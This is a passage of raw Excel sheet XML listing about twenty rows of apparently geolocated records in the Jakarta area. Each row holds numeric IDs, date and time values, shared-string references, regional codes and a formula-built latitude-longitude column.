        <v>108</v>
      </c>
      <c r="T3175" t="s">
        <v>33</v>
      </c>
      <c r="U3175" s="5">
        <v>10683573</v>
      </c>
      <c r="V3175" s="5" t="s">
        <v>17306</v>
      </c>
      <c r="W3175" s="5">
        <v>-624421</v>
      </c>
      <c r="X3175" t="s">
        <v>21045</v>
      </c>
      <c r="Y3175" t="str">
        <f t="shared" si="49"/>
        <v>-6.24421,106.83573</v>
      </c>
    </row>
    <row r="3176" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3176">
        <v>258185</v>
      </c>
      <c r="B3176" s="1">
        <v>44246</v>
      </c>
      <c r="C3176" s="2">
        <v>0.91758101851851848</v>
      </c>
      <c r="D3176" t="s">
        <v>22</v>
      </c>
      <c r="E3176" t="s">
        <v>23</v>
      </c>
      <c r="F3176" t="s">
        <v>10652</v>
      </c>
      <c r="G3176" t="s">
        <v>10653</v>
      </c>
      <c r="H3176" t="s">
        <v>26</v>
      </c>
      <c r="I3176" t="s">
        <v>10654</v>
      </c>
      <c r="J3176" t="s">
        <v>160</v>
      </c>
      <c r="L3176" t="s">
        <v>10655</v>
      </c>
      <c r="M3176">
        <v>3171040001</v>
      </c>
      <c r="N3176">
        <v>3171040</v>
      </c>
      <c r="O3176">
        <v>3171</v>
      </c>
      <c r="P3176">
        <v>31</v>
      </c>
      <c r="Q3176" t="s">
        <v>162</v>
      </c>
      <c r="R3176" t="s">
        <v>163</v>
      </c>
      <c r="S3176" t="s">
        <v>108</v>
      </c>
      <c r="T3176" t="s">
        <v>33</v>
      </c>
      <c r="U3176" s="5">
        <v>10677099</v>
      </c>
      <c r="V3176" s="5" t="s">
        <v>17307</v>
      </c>
      <c r="W3176" s="5">
        <v>-626063</v>
      </c>
      <c r="X3176" t="s">
        <v>21046</v>
      </c>
      <c r="Y3176" t="str">
        <f t="shared" si="49"/>
        <v>-6.26063,106.77099</v>
      </c>
    </row>
    <row r="3177" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3177">
        <v>258200</v>
      </c>
      <c r="B3177" s="1">
        <v>44246</v>
      </c>
      <c r="C3177" s="2">
        <v>0.91930555555555549</v>
      </c>
      <c r="D3177" t="s">
        <v>22</v>
      </c>
      <c r="E3177" t="s">
        <v>23</v>
      </c>
      <c r="F3177" t="s">
        <v>10656</v>
      </c>
      <c r="H3177" t="s">
        <v>26</v>
      </c>
      <c r="I3177" t="s">
        <v>592</v>
      </c>
      <c r="J3177" t="s">
        <v>2627</v>
      </c>
      <c r="L3177" t="s">
        <v>10657</v>
      </c>
      <c r="M3177">
        <v>3275050001</v>
      </c>
      <c r="N3177">
        <v>3275050</v>
      </c>
      <c r="O3177">
        <v>3275</v>
      </c>
      <c r="P3177">
        <v>32</v>
      </c>
      <c r="Q3177" t="s">
        <v>4376</v>
      </c>
      <c r="R3177" t="s">
        <v>955</v>
      </c>
      <c r="S3177" t="s">
        <v>41</v>
      </c>
      <c r="T3177" t="s">
        <v>42</v>
      </c>
      <c r="U3177" s="5">
        <v>10695675</v>
      </c>
      <c r="V3177" s="5" t="s">
        <v>17308</v>
      </c>
      <c r="W3177" s="5">
        <v>-626716</v>
      </c>
      <c r="X3177" t="s">
        <v>21047</v>
      </c>
      <c r="Y3177" t="str">
        <f t="shared" si="49"/>
        <v>-6.26716,106.95675</v>
      </c>
    </row>
    <row r="3178" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3178">
        <v>258201</v>
      </c>
      <c r="B3178" s="1">
        <v>44246</v>
      </c>
      <c r="C3178" s="2">
        <v>0.91965277777777776</v>
      </c>
      <c r="D3178" t="s">
        <v>22</v>
      </c>
      <c r="E3178" t="s">
        <v>23</v>
      </c>
      <c r="F3178" t="s">
        <v>10658</v>
      </c>
      <c r="G3178" t="s">
        <v>10659</v>
      </c>
      <c r="H3178" t="s">
        <v>26</v>
      </c>
      <c r="I3178" t="s">
        <v>3042</v>
      </c>
      <c r="J3178" t="s">
        <v>10660</v>
      </c>
      <c r="M3178">
        <v>3174020004</v>
      </c>
      <c r="N3178">
        <v>3174020</v>
      </c>
      <c r="O3178">
        <v>3174</v>
      </c>
      <c r="P3178">
        <v>31</v>
      </c>
      <c r="Q3178" t="s">
        <v>31</v>
      </c>
      <c r="R3178" t="s">
        <v>31</v>
      </c>
      <c r="S3178" t="s">
        <v>32</v>
      </c>
      <c r="T3178" t="s">
        <v>33</v>
      </c>
      <c r="U3178" s="5">
        <v>10675902</v>
      </c>
      <c r="V3178" s="5" t="s">
        <v>17309</v>
      </c>
      <c r="W3178" s="5">
        <v>-619237</v>
      </c>
      <c r="X3178" t="s">
        <v>21048</v>
      </c>
      <c r="Y3178" t="str">
        <f t="shared" si="49"/>
        <v>-6.19237,106.75902</v>
      </c>
    </row>
    <row r="3179" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3179">
        <v>258203</v>
      </c>
      <c r="B3179" s="1">
        <v>44246</v>
      </c>
      <c r="C3179" s="2">
        <v>0.88958333333333339</v>
      </c>
      <c r="D3179" t="s">
        <v>2648</v>
      </c>
      <c r="E3179" t="s">
        <v>23</v>
      </c>
      <c r="G3179" t="s">
        <v>10661</v>
      </c>
      <c r="H3179" t="s">
        <v>26</v>
      </c>
      <c r="J3179" t="s">
        <v>2902</v>
      </c>
      <c r="L3179" t="s">
        <v>10662</v>
      </c>
      <c r="M3179">
        <v>3172020003</v>
      </c>
      <c r="N3179">
        <v>3172020</v>
      </c>
      <c r="O3179">
        <v>3172</v>
      </c>
      <c r="P3179">
        <v>31</v>
      </c>
      <c r="Q3179" t="s">
        <v>1644</v>
      </c>
      <c r="R3179" t="s">
        <v>1644</v>
      </c>
      <c r="S3179" t="s">
        <v>49</v>
      </c>
      <c r="T3179" t="s">
        <v>33</v>
      </c>
      <c r="U3179" s="5">
        <v>10687997</v>
      </c>
      <c r="V3179" s="5" t="s">
        <v>15185</v>
      </c>
      <c r="W3179" s="5">
        <v>-631802</v>
      </c>
      <c r="X3179" t="s">
        <v>21049</v>
      </c>
      <c r="Y3179" t="str">
        <f t="shared" si="49"/>
        <v>-6.31802,106.87997</v>
      </c>
    </row>
    <row r="3180" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3180">
        <v>258205</v>
      </c>
      <c r="B3180" s="1">
        <v>44246</v>
      </c>
      <c r="C3180" s="2">
        <v>0.76944444444444438</v>
      </c>
      <c r="D3180" t="s">
        <v>2648</v>
      </c>
      <c r="E3180" t="s">
        <v>23</v>
      </c>
      <c r="G3180" t="s">
        <v>10663</v>
      </c>
      <c r="H3180" t="s">
        <v>26</v>
      </c>
      <c r="J3180" t="s">
        <v>8233</v>
      </c>
      <c r="L3180" t="s">
        <v>10664</v>
      </c>
      <c r="M3180">
        <v>3172020005</v>
      </c>
      <c r="N3180">
        <v>3172020</v>
      </c>
      <c r="O3180">
        <v>3172</v>
      </c>
      <c r="P3180">
        <v>31</v>
      </c>
      <c r="Q3180" t="s">
        <v>3744</v>
      </c>
      <c r="R3180" t="s">
        <v>1644</v>
      </c>
      <c r="S3180" t="s">
        <v>49</v>
      </c>
      <c r="T3180" t="s">
        <v>33</v>
      </c>
      <c r="U3180" s="5">
        <v>10687449</v>
      </c>
      <c r="V3180" s="5" t="s">
        <v>17310</v>
      </c>
      <c r="W3180" s="5">
        <v>-630213</v>
      </c>
      <c r="X3180" t="s">
        <v>21050</v>
      </c>
      <c r="Y3180" t="str">
        <f t="shared" si="49"/>
        <v>-6.30213,106.87449</v>
      </c>
    </row>
    <row r="3181" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3181">
        <v>258206</v>
      </c>
      <c r="B3181" s="1">
        <v>44246</v>
      </c>
      <c r="C3181" s="2">
        <v>0.8305555555555556</v>
      </c>
      <c r="D3181" t="s">
        <v>2648</v>
      </c>
      <c r="E3181" t="s">
        <v>23</v>
      </c>
      <c r="G3181" t="s">
        <v>10665</v>
      </c>
      <c r="H3181" t="s">
        <v>26</v>
      </c>
      <c r="J3181" t="s">
        <v>10666</v>
      </c>
      <c r="L3181" t="s">
        <v>10667</v>
      </c>
      <c r="M3181">
        <v>3171040001</v>
      </c>
      <c r="N3181">
        <v>3171040</v>
      </c>
      <c r="O3181">
        <v>3171</v>
      </c>
      <c r="P3181">
        <v>31</v>
      </c>
      <c r="Q3181" t="s">
        <v>162</v>
      </c>
      <c r="R3181" t="s">
        <v>163</v>
      </c>
      <c r="S3181" t="s">
        <v>108</v>
      </c>
      <c r="T3181" t="s">
        <v>33</v>
      </c>
      <c r="U3181" s="5">
        <v>10676567</v>
      </c>
      <c r="V3181" s="5" t="s">
        <v>17311</v>
      </c>
      <c r="W3181" s="5">
        <v>-625705</v>
      </c>
      <c r="X3181" t="s">
        <v>21051</v>
      </c>
      <c r="Y3181" t="str">
        <f t="shared" si="49"/>
        <v>-6.25705,106.76567</v>
      </c>
    </row>
    <row r="3182" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3182">
        <v>258207</v>
      </c>
      <c r="B3182" s="1">
        <v>44246</v>
      </c>
      <c r="C3182" s="2">
        <v>0.87430555555555556</v>
      </c>
      <c r="D3182" t="s">
        <v>2648</v>
      </c>
      <c r="E3182" t="s">
        <v>23</v>
      </c>
      <c r="G3182" t="s">
        <v>10668</v>
      </c>
      <c r="H3182" t="s">
        <v>26</v>
      </c>
      <c r="J3182" t="s">
        <v>10669</v>
      </c>
      <c r="L3182" t="s">
        <v>10670</v>
      </c>
      <c r="M3182">
        <v>3171020005</v>
      </c>
      <c r="N3182">
        <v>3171020</v>
      </c>
      <c r="O3182">
        <v>3171</v>
      </c>
      <c r="P3182">
        <v>31</v>
      </c>
      <c r="Q3182" t="s">
        <v>483</v>
      </c>
      <c r="R3182" t="s">
        <v>484</v>
      </c>
      <c r="S3182" t="s">
        <v>108</v>
      </c>
      <c r="T3182" t="s">
        <v>33</v>
      </c>
      <c r="U3182" s="5">
        <v>10683334</v>
      </c>
      <c r="V3182" s="5" t="s">
        <v>17312</v>
      </c>
      <c r="W3182" s="5">
        <v>-628278</v>
      </c>
      <c r="X3182" t="s">
        <v>21052</v>
      </c>
      <c r="Y3182" t="str">
        <f t="shared" si="49"/>
        <v>-6.28278,106.83334</v>
      </c>
    </row>
    <row r="3183" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3183">
        <v>258208</v>
      </c>
      <c r="B3183" s="1">
        <v>44246</v>
      </c>
      <c r="C3183" s="2">
        <v>0.71944444444444444</v>
      </c>
      <c r="D3183" t="s">
        <v>2648</v>
      </c>
      <c r="E3183" t="s">
        <v>23</v>
      </c>
      <c r="G3183" t="s">
        <v>10671</v>
      </c>
      <c r="H3183" t="s">
        <v>26</v>
      </c>
      <c r="J3183" t="s">
        <v>8086</v>
      </c>
      <c r="L3183" t="s">
        <v>10672</v>
      </c>
      <c r="M3183">
        <v>3171050005</v>
      </c>
      <c r="N3183">
        <v>3171050</v>
      </c>
      <c r="O3183">
        <v>3171</v>
      </c>
      <c r="P3183">
        <v>31</v>
      </c>
      <c r="Q3183" t="s">
        <v>8057</v>
      </c>
      <c r="R3183" t="s">
        <v>508</v>
      </c>
      <c r="S3183" t="s">
        <v>108</v>
      </c>
      <c r="T3183" t="s">
        <v>33</v>
      </c>
      <c r="U3183" s="5">
        <v>10677406</v>
      </c>
      <c r="V3183" s="5" t="s">
        <v>17313</v>
      </c>
      <c r="W3183" s="5">
        <v>-622823</v>
      </c>
      <c r="X3183" t="s">
        <v>18967</v>
      </c>
      <c r="Y3183" t="str">
        <f t="shared" si="49"/>
        <v>-6.22823,106.77406</v>
      </c>
    </row>
    <row r="3184" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3184">
        <v>258215</v>
      </c>
      <c r="B3184" s="1">
        <v>44246</v>
      </c>
      <c r="C3184" s="2">
        <v>0.75416666666666676</v>
      </c>
      <c r="D3184" t="s">
        <v>2648</v>
      </c>
      <c r="E3184" t="s">
        <v>23</v>
      </c>
      <c r="G3184" t="s">
        <v>10673</v>
      </c>
      <c r="H3184" t="s">
        <v>26</v>
      </c>
      <c r="J3184" t="s">
        <v>5747</v>
      </c>
      <c r="L3184" t="s">
        <v>10674</v>
      </c>
      <c r="M3184">
        <v>3172050002</v>
      </c>
      <c r="N3184">
        <v>3172050</v>
      </c>
      <c r="O3184">
        <v>3172</v>
      </c>
      <c r="P3184">
        <v>31</v>
      </c>
      <c r="Q3184" t="s">
        <v>5749</v>
      </c>
      <c r="R3184" t="s">
        <v>358</v>
      </c>
      <c r="S3184" t="s">
        <v>49</v>
      </c>
      <c r="T3184" t="s">
        <v>33</v>
      </c>
      <c r="U3184" s="5">
        <v>10685787</v>
      </c>
      <c r="V3184" s="5" t="s">
        <v>17314</v>
      </c>
      <c r="W3184" s="5">
        <v>-628184</v>
      </c>
      <c r="X3184" t="s">
        <v>21053</v>
      </c>
      <c r="Y3184" t="str">
        <f t="shared" si="49"/>
        <v>-6.28184,106.85787</v>
      </c>
    </row>
    <row r="3185" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3185">
        <v>258216</v>
      </c>
      <c r="B3185" s="1">
        <v>44246</v>
      </c>
      <c r="C3185" s="2">
        <v>0.92013888888888884</v>
      </c>
      <c r="D3185" t="s">
        <v>2648</v>
      </c>
      <c r="E3185" t="s">
        <v>23</v>
      </c>
      <c r="G3185" t="s">
        <v>10675</v>
      </c>
      <c r="H3185" t="s">
        <v>26</v>
      </c>
      <c r="J3185" t="s">
        <v>10676</v>
      </c>
      <c r="L3185" t="s">
        <v>10677</v>
      </c>
      <c r="M3185">
        <v>3171020003</v>
      </c>
      <c r="N3185">
        <v>3171020</v>
      </c>
      <c r="O3185">
        <v>3171</v>
      </c>
      <c r="P3185">
        <v>31</v>
      </c>
      <c r="Q3185" t="s">
        <v>7783</v>
      </c>
      <c r="R3185" t="s">
        <v>484</v>
      </c>
      <c r="S3185" t="s">
        <v>108</v>
      </c>
      <c r="T3185" t="s">
        <v>33</v>
      </c>
      <c r="U3185" s="5">
        <v>10682950</v>
      </c>
      <c r="V3185" s="5" t="s">
        <v>17315</v>
      </c>
      <c r="W3185" s="5">
        <v>-630812</v>
      </c>
      <c r="X3185" t="s">
        <v>21054</v>
      </c>
      <c r="Y3185" t="str">
        <f t="shared" si="49"/>
        <v>-6.30812,106.82950</v>
      </c>
    </row>
    <row r="3186" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3186">
        <v>258244</v>
      </c>
      <c r="B3186" s="1">
        <v>44246</v>
      </c>
      <c r="C3186" s="2">
        <v>0.92734953703703704</v>
      </c>
      <c r="D3186" t="s">
        <v>22</v>
      </c>
      <c r="E3186" t="s">
        <v>23</v>
      </c>
      <c r="F3186" t="s">
        <v>10678</v>
      </c>
      <c r="H3186" t="s">
        <v>26</v>
      </c>
      <c r="I3186" t="s">
        <v>5270</v>
      </c>
      <c r="J3186" t="s">
        <v>3135</v>
      </c>
      <c r="L3186" t="s">
        <v>10679</v>
      </c>
      <c r="M3186">
        <v>3674070004</v>
      </c>
      <c r="N3186">
        <v>3674070</v>
      </c>
      <c r="O3186">
        <v>3674</v>
      </c>
      <c r="P3186">
        <v>36</v>
      </c>
      <c r="Q3186" t="s">
        <v>7851</v>
      </c>
      <c r="R3186" t="s">
        <v>707</v>
      </c>
      <c r="S3186" t="s">
        <v>170</v>
      </c>
      <c r="T3186" t="s">
        <v>171</v>
      </c>
      <c r="U3186" s="5">
        <v>10667907</v>
      </c>
      <c r="V3186" s="5" t="s">
        <v>17316</v>
      </c>
      <c r="W3186" s="5">
        <v>-625869</v>
      </c>
      <c r="X3186" t="s">
        <v>21055</v>
      </c>
      <c r="Y3186" t="str">
        <f t="shared" si="49"/>
        <v>-6.25869,106.67907</v>
      </c>
    </row>
    <row r="3187" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3187">
        <v>258266</v>
      </c>
      <c r="B3187" s="1">
        <v>44246</v>
      </c>
      <c r="C3187" s="2">
        <v>0.92958333333333332</v>
      </c>
      <c r="D3187" t="s">
        <v>22</v>
      </c>
      <c r="E3187" t="s">
        <v>23</v>
      </c>
      <c r="F3187" t="s">
        <v>10680</v>
      </c>
      <c r="H3187" t="s">
        <v>26</v>
      </c>
      <c r="I3187" t="s">
        <v>3668</v>
      </c>
      <c r="J3187" t="s">
        <v>3135</v>
      </c>
      <c r="L3187" t="s">
        <v>10681</v>
      </c>
      <c r="M3187">
        <v>3674070004</v>
      </c>
      <c r="N3187">
        <v>3674070</v>
      </c>
      <c r="O3187">
        <v>3674</v>
      </c>
      <c r="P3187">
        <v>36</v>
      </c>
      <c r="Q3187" t="s">
        <v>7851</v>
      </c>
      <c r="R3187" t="s">
        <v>707</v>
      </c>
      <c r="S3187" t="s">
        <v>170</v>
      </c>
      <c r="T3187" t="s">
        <v>171</v>
      </c>
      <c r="U3187" s="5">
        <v>10667618</v>
      </c>
      <c r="V3187" s="5" t="s">
        <v>17317</v>
      </c>
      <c r="W3187" s="5">
        <v>-625762</v>
      </c>
      <c r="X3187" t="s">
        <v>21056</v>
      </c>
      <c r="Y3187" t="str">
        <f t="shared" si="49"/>
        <v>-6.25762,106.67618</v>
      </c>
    </row>
    <row r="3188" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3188">
        <v>258287</v>
      </c>
      <c r="B3188" s="1">
        <v>44246</v>
      </c>
      <c r="C3188" s="2">
        <v>0.93269675925925932</v>
      </c>
      <c r="D3188" t="s">
        <v>22</v>
      </c>
      <c r="E3188" t="s">
        <v>23</v>
      </c>
      <c r="F3188" t="s">
        <v>10682</v>
      </c>
      <c r="G3188" t="s">
        <v>10683</v>
      </c>
      <c r="H3188" t="s">
        <v>26</v>
      </c>
      <c r="I3188" t="s">
        <v>834</v>
      </c>
      <c r="J3188" t="s">
        <v>10684</v>
      </c>
      <c r="M3188">
        <v>3171020002</v>
      </c>
      <c r="N3188">
        <v>3171020</v>
      </c>
      <c r="O3188">
        <v>3171</v>
      </c>
      <c r="P3188">
        <v>31</v>
      </c>
      <c r="Q3188" t="s">
        <v>1172</v>
      </c>
      <c r="R3188" t="s">
        <v>484</v>
      </c>
      <c r="S3188" t="s">
        <v>108</v>
      </c>
      <c r="T3188" t="s">
        <v>33</v>
      </c>
      <c r="U3188" s="5">
        <v>10681585</v>
      </c>
      <c r="V3188" s="5" t="s">
        <v>17318</v>
      </c>
      <c r="W3188" s="5">
        <v>-630341</v>
      </c>
      <c r="X3188" t="s">
        <v>21057</v>
      </c>
      <c r="Y3188" t="str">
        <f t="shared" si="49"/>
        <v>-6.30341,106.81585</v>
      </c>
    </row>
    <row r="3189" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3189">
        <v>258288</v>
      </c>
      <c r="B3189" s="1">
        <v>44246</v>
      </c>
      <c r="C3189" s="2">
        <v>0.9350694444444444</v>
      </c>
      <c r="D3189" t="s">
        <v>22</v>
      </c>
      <c r="E3189" t="s">
        <v>23</v>
      </c>
      <c r="F3189" t="s">
        <v>10685</v>
      </c>
      <c r="H3189" t="s">
        <v>26</v>
      </c>
      <c r="I3189" t="s">
        <v>523</v>
      </c>
      <c r="J3189" t="s">
        <v>10686</v>
      </c>
      <c r="L3189" t="s">
        <v>10687</v>
      </c>
      <c r="M3189">
        <v>3173010005</v>
      </c>
      <c r="N3189">
        <v>3173010</v>
      </c>
      <c r="O3189">
        <v>3173</v>
      </c>
      <c r="P3189">
        <v>31</v>
      </c>
      <c r="Q3189" t="s">
        <v>5805</v>
      </c>
      <c r="R3189" t="s">
        <v>1481</v>
      </c>
      <c r="S3189" t="s">
        <v>62</v>
      </c>
      <c r="T3189" t="s">
        <v>33</v>
      </c>
      <c r="U3189" s="5">
        <v>10681004</v>
      </c>
      <c r="V3189" s="5" t="s">
        <v>17319</v>
      </c>
      <c r="W3189" s="5">
        <v>-618926</v>
      </c>
      <c r="X3189" t="s">
        <v>20924</v>
      </c>
      <c r="Y3189" t="str">
        <f t="shared" si="49"/>
        <v>-6.18926,106.81004</v>
      </c>
    </row>
    <row r="3190" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3190">
        <v>258309</v>
      </c>
      <c r="B3190" s="1">
        <v>44246</v>
      </c>
      <c r="C3190" s="2">
        <v>0.93570601851851853</v>
      </c>
      <c r="D3190" t="s">
        <v>22</v>
      </c>
      <c r="E3190" t="s">
        <v>23</v>
      </c>
      <c r="F3190" t="s">
        <v>10688</v>
      </c>
      <c r="G3190" t="s">
        <v>10689</v>
      </c>
      <c r="H3190" t="s">
        <v>26</v>
      </c>
      <c r="I3190" t="s">
        <v>2110</v>
      </c>
      <c r="J3190" t="s">
        <v>10660</v>
      </c>
      <c r="M3190">
        <v>3174020004</v>
      </c>
      <c r="N3190">
        <v>3174020</v>
      </c>
      <c r="O3190">
        <v>3174</v>
      </c>
      <c r="P3190">
        <v>31</v>
      </c>
      <c r="Q3190" t="s">
        <v>31</v>
      </c>
      <c r="R3190" t="s">
        <v>31</v>
      </c>
      <c r="S3190" t="s">
        <v>32</v>
      </c>
      <c r="T3190" t="s">
        <v>33</v>
      </c>
      <c r="U3190" s="5">
        <v>10675922</v>
      </c>
      <c r="V3190" s="5" t="s">
        <v>17320</v>
      </c>
      <c r="W3190" s="5">
        <v>-619314</v>
      </c>
      <c r="X3190" t="s">
        <v>21058</v>
      </c>
      <c r="Y3190" t="str">
        <f t="shared" si="49"/>
        <v>-6.19314,106.75922</v>
      </c>
    </row>
    <row r="3191" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3191">
        <v>258310</v>
      </c>
      <c r="B3191" s="1">
        <v>44246</v>
      </c>
      <c r="C3191" s="2">
        <v>0.93747685185185192</v>
      </c>
      <c r="D3191" t="s">
        <v>22</v>
      </c>
      <c r="E3191" t="s">
        <v>23</v>
      </c>
      <c r="F3191" t="s">
        <v>10690</v>
      </c>
      <c r="G3191" t="s">
        <v>10691</v>
      </c>
      <c r="H3191" t="s">
        <v>26</v>
      </c>
      <c r="I3191" t="s">
        <v>3704</v>
      </c>
      <c r="J3191" t="s">
        <v>10692</v>
      </c>
      <c r="L3191" t="s">
        <v>10693</v>
      </c>
      <c r="M3191">
        <v>3171020002</v>
      </c>
      <c r="N3191">
        <v>3171020</v>
      </c>
      <c r="O3191">
        <v>3171</v>
      </c>
      <c r="P3191">
        <v>31</v>
      </c>
      <c r="Q3191" t="s">
        <v>1172</v>
      </c>
      <c r="R3191" t="s">
        <v>484</v>
      </c>
      <c r="S3191" t="s">
        <v>108</v>
      </c>
      <c r="T3191" t="s">
        <v>33</v>
      </c>
      <c r="U3191" s="5">
        <v>10681642</v>
      </c>
      <c r="V3191" s="5" t="s">
        <v>17321</v>
      </c>
      <c r="W3191" s="5">
        <v>-630106</v>
      </c>
      <c r="X3191" t="s">
        <v>21059</v>
      </c>
      <c r="Y3191" t="str">
        <f t="shared" si="49"/>
        <v>-6.30106,106.81642</v>
      </c>
    </row>
    <row r="3192" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3192">
        <v>258311</v>
      </c>
      <c r="B3192" s="1">
        <v>44246</v>
      </c>
      <c r="C3192" s="2">
        <v>0.93778935185185175</v>
      </c>
      <c r="D3192" t="s">
        <v>22</v>
      </c>
      <c r="E3192" t="s">
        <v>23</v>
      </c>
      <c r="F3192" t="s">
        <v>10694</v>
      </c>
      <c r="G3192" t="s">
        <v>10695</v>
      </c>
      <c r="H3192" t="s">
        <v>26</v>
      </c>
      <c r="I3192" t="s">
        <v>10696</v>
      </c>
      <c r="J3192" t="s">
        <v>10697</v>
      </c>
      <c r="L3192" t="s">
        <v>10698</v>
      </c>
      <c r="M3192">
        <v>3171030004</v>
      </c>
      <c r="N3192">
        <v>3171030</v>
      </c>
      <c r="O3192">
        <v>3171</v>
      </c>
      <c r="P3192">
        <v>31</v>
      </c>
      <c r="Q3192" t="s">
        <v>6660</v>
      </c>
      <c r="R3192" t="s">
        <v>364</v>
      </c>
      <c r="S3192" t="s">
        <v>108</v>
      </c>
      <c r="T3192" t="s">
        <v>33</v>
      </c>
      <c r="U3192" s="5">
        <v>10679261</v>
      </c>
      <c r="V3192" s="5" t="s">
        <v>17322</v>
      </c>
      <c r="W3192" s="5">
        <v>-627632</v>
      </c>
      <c r="X3192" t="s">
        <v>21060</v>
      </c>
      <c r="Y3192" t="str">
        <f t="shared" si="49"/>
        <v>-6.27632,106.79261</v>
      </c>
    </row>
    <row r="3193" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3193">
        <v>258332</v>
      </c>
      <c r="B3193" s="1">
        <v>44246</v>
      </c>
      <c r="C3193" s="2">
        <v>0.94002314814814814</v>
      </c>
      <c r="D3193" t="s">
        <v>22</v>
      </c>
      <c r="E3193" t="s">
        <v>23</v>
      </c>
      <c r="F3193" t="s">
        <v>10699</v>
      </c>
      <c r="G3193" t="s">
        <v>10700</v>
      </c>
      <c r="H3193" t="s">
        <v>26</v>
      </c>
      <c r="I3193" t="s">
        <v>181</v>
      </c>
      <c r="J3193" t="s">
        <v>2627</v>
      </c>
      <c r="L3193" t="s">
        <v>10701</v>
      </c>
      <c r="M3193">
        <v>3275010012</v>
      </c>
      <c r="N3193">
        <v>3275010</v>
      </c>
      <c r="O3193">
        <v>3275</v>
      </c>
      <c r="P3193">
        <v>32</v>
      </c>
      <c r="Q3193" t="s">
        <v>2322</v>
      </c>
      <c r="R3193" t="s">
        <v>287</v>
      </c>
      <c r="S3193" t="s">
        <v>41</v>
      </c>
      <c r="T3193" t="s">
        <v>42</v>
      </c>
      <c r="U3193" s="5">
        <v>10693566</v>
      </c>
      <c r="V3193" s="5" t="s">
        <v>17323</v>
      </c>
      <c r="W3193" s="5">
        <v>-626225</v>
      </c>
      <c r="X3193" t="s">
        <v>21061</v>
      </c>
      <c r="Y3193" t="str">
        <f t="shared" si="49"/>
        <v>-6.26225,106.93566</v>
      </c>
    </row>
    <row r="3194" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3194">
        <v>258353</v>
      </c>
      <c r="B3194" s="1">
        <v>44246</v>
      </c>
      <c r="C3194" s="2">
        <v>0.94408564814814822</v>
      </c>
      <c r="D3194" t="s">
        <v>22</v>
      </c>
      <c r="E3194" t="s">
        <v>23</v>
      </c>
      <c r="F3194" t="s">
        <v>10702</v>
      </c>
      <c r="G3194" t="s">
        <v>10703</v>
      </c>
      <c r="H3194" t="s">
        <v>26</v>
      </c>
      <c r="I3194" t="s">
        <v>666</v>
      </c>
      <c r="J3194" t="s">
        <v>10704</v>
      </c>
      <c r="L3194" t="s">
        <v>10705</v>
      </c>
      <c r="M3194">
        <v>3171010005</v>
      </c>
      <c r="N3194">
        <v>3171010</v>
      </c>
      <c r="O3194">
        <v>3171</v>
      </c>
      <c r="P3194">
        <v>31</v>
      </c>
      <c r="Q3194" t="s">
        <v>10706</v>
      </c>
      <c r="R3194" t="s">
        <v>264</v>
      </c>
      <c r="S3194" t="s">
        <v>108</v>
      </c>
      <c r="T3194" t="s">
        <v>33</v>
      </c>
      <c r="U3194" s="5">
        <v>10683022</v>
      </c>
      <c r="V3194" s="5" t="s">
        <v>17324</v>
      </c>
      <c r="W3194" s="5">
        <v>-632732</v>
      </c>
      <c r="X3194" t="s">
        <v>21062</v>
      </c>
      <c r="Y3194" t="str">
        <f t="shared" si="49"/>
        <v>-6.32732,106.83022</v>
      </c>
    </row>
    <row r="3195" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3195">
        <v>258374</v>
      </c>
      <c r="B3195" s="1">
        <v>44246</v>
      </c>
      <c r="C3195" s="2">
        <v>0.94640046296296287</v>
      </c>
      <c r="D3195" t="s">
        <v>22</v>
      </c>
      <c r="E3195" t="s">
        <v>23</v>
      </c>
      <c r="F3195" t="s">
        <v>10707</v>
      </c>
      <c r="G3195" t="s">
        <v>10708</v>
      </c>
      <c r="H3195" t="s">
        <v>26</v>
      </c>
      <c r="I3195" t="s">
        <v>3243</v>
      </c>
      <c r="J3195" t="s">
        <v>3135</v>
      </c>
      <c r="L3195" t="s">
        <v>10709</v>
      </c>
      <c r="M3195">
        <v>3674060003</v>
      </c>
      <c r="N3195">
        <v>3674060</v>
      </c>
      <c r="O3195">
        <v>3674</v>
      </c>
      <c r="P3195">
        <v>36</v>
      </c>
      <c r="Q3195" t="s">
        <v>205</v>
      </c>
      <c r="R3195" t="s">
        <v>169</v>
      </c>
      <c r="S3195" t="s">
        <v>170</v>
      </c>
      <c r="T3195" t="s">
        <v>171</v>
      </c>
      <c r="U3195" s="5">
        <v>10669218</v>
      </c>
      <c r="V3195" s="5" t="s">
        <v>17325</v>
      </c>
      <c r="W3195" s="5">
        <v>-624726</v>
      </c>
      <c r="X3195" t="s">
        <v>21063</v>
      </c>
      <c r="Y3195" t="str">
        <f t="shared" si="49"/>
        <v>-6.24726,106.69218</v>
      </c>
    </row>
    <row r="3196" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3196">
        <v>258395</v>
      </c>
      <c r="B3196" s="1">
        <v>44246</v>
      </c>
      <c r="C3196" s="2">
        <v>0.94900462962962961</v>
      </c>
      <c r="D3196" t="s">
        <v>22</v>
      </c>
      <c r="E3196" t="s">
        <v>23</v>
      </c>
      <c r="F3196" t="s">
        <v>10710</v>
      </c>
      <c r="G3196" t="s">
        <v>10711</v>
      </c>
      <c r="H3196" t="s">
        <v>26</v>
      </c>
      <c r="I3196" t="s">
        <v>284</v>
      </c>
      <c r="J3196" t="s">
        <v>10544</v>
      </c>
      <c r="L3196" t="s">
        <v>10712</v>
      </c>
      <c r="M3196">
        <v>3171020005</v>
      </c>
      <c r="N3196">
        <v>3171020</v>
      </c>
      <c r="O3196">
        <v>3171</v>
      </c>
      <c r="P3196">
        <v>31</v>
      </c>
      <c r="Q3196" t="s">
        <v>483</v>
      </c>
